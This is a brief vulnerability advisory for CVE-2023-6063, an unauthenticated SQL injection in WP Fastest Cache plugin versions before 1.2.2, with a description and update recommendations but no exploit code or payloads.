CVE-2023-6063

Name of the Vulnerable Software and Affected Versions WP Fastest Cache versions prior to 1.2.2

Description The issue is related to the WP Fastest Cache WordPress plugin, which does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users. This allows an attacker to execute arbitrary SQL queries. The vulnerability affects over 1 million sites.

Recommendations For versions prior to 1.2.2, update to version 1.2.2 or later to resolve the issue. As a temporary workaround, consider restricting access to the SQL database to minimize the risk of exploitation. Avoid using the wordpress logged in HTTP header Cookie parameter in the affected API endpoint until the issue is resolved.